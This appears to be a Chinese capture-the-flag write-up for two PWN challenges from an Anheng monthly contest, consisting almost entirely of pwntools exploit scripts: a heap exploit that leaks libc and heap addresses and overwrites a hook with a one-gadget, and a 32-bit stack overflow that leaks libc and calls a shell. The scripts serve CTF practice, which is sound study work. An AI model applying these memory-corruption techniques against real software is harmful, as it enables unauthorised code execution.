安恒一月赛 PWN

0x01 pwn1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import *
#context.log_level="debug"
def add(name,length,note):
p.sendlineafter("4:exit\n","1")
p.sendafter("Name:",name)
p.sendlineafter("Len",str(length))
p.sendafter("Description:",note)

def delete(index):
p.sendlineafter("4:exit\n","2")
p.sendlineafter("Back.\n>",str(index))

def edit(name,length,note,index):
p.sendlineafter("4:exit\n","3")
p.sendlineafter("Back.\n>",str(index))
p.sendafter("?",name)
p.sendlineafter("?",str(length))
p.sendafter("Description :",note)
p=process("./mycard")
#p=remote("101.71.29.5",10006)
add("1\n",0x40,"1"*0x40)
add("2\n",0x50,"2"*0x50)
add("3\n",0x60,"3"*4+p64(0x31)+"3"*32+p64(0)+p64(0x21)+p64(0)*2+p64(0)+p64(0xb1)+p32(0))
add("4\n",0x70,"4\n")
add("5\n",0x90,"555\n")
add("6\n",0x60,"666\n")
delete(5)
add("5\n",0x90,"5\n")
p.sendlineafter("4:exit\n","2")
p.recvuntil("Description :5")
p.recv(7)
p.send("\n")
libc_addr=u64(p.recv(8))
print hex(libc_addr)
for i in range(6):
delete(1)
add("/bin/sh\x00\n",0x40,"1"*0x40)
add("2\n",0x50,"2"*0x50)
add("3\n",0x60,"3"*4+p64(0x31)+"3"*32+p64(0)+p64(0x21)+p64(0)*2+p64(0)+p64(0xb1)+p32(0))
add("4\n",0x70,"4\n")
add("5\n",0x90,"555\n")
#add("kirin\n",0x80,"5\n")
delete(3)
delete(3)
#gdb.attach(p)
p.sendlineafter("4:exit\n","2")
p.recvuntil("[3] Name :")
p.recv(24)
heap_addr=u64(p.recv(6)+"\x00\x00")
print hex(heap_addr)
#p.recv(1024)
#add("kirin\n",4,"1234")
p.send("\n")
edit(p64(0xb0)+p64(0x20)+p64(heap_addr+0x100)+"\n",0x10,"kirin\n",3)
add("a\n",0x60,"b"*0x10+"\n")
add("a\n",0x60,"a"*0x10+"\n")
add("c\n",0x60,"c"*0x10+"\n")
edit("kirin\n",0x60,"3"*4+p64(0x31)+"3"*32+p64(0)+p64(0x21)+p64(libc_addr-0x68-0x3)+"\n",3)
#gdb.attach(p)
print hex(libc_addr-0x68-0x3)
edit("a"*0x3+p64(libc_addr-0x68-0x3c4b10+0xf1147)+"\x00"*40+"\n",0x20,"\n",5)
add("\x00"*60+"\n",0x10,"\x00"*100)
#gdb.attach(p)
p.interactive()

0x02 pwn2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
from time import *
context.log_level='debug'

#while True:
# if int(time())==now+3:
# break
#p=remote("101.71.29.5",10013)
p=process("./rrr")
p.recvuntil(">\n")
payload1="a"*47+"\x00"+p32(0x804a888)+p32(0x8048410)+p32(0x8048602)+p32(0x804a018)
p.sendline(payload1)
s=u32(p.recvuntil("\n")[:4])-0x5fca0+0x3ada0#-0x5f140+0x3a940
payload1="a"*47+"\x00"+p32(0x804a888)+p32(s)+p32(0)+p32(s-0x3ada0+0x15ba0b)#-0x3a940+0x15902b)
#gdb.attach(p)
p.sendline(payload1)
p.interactive()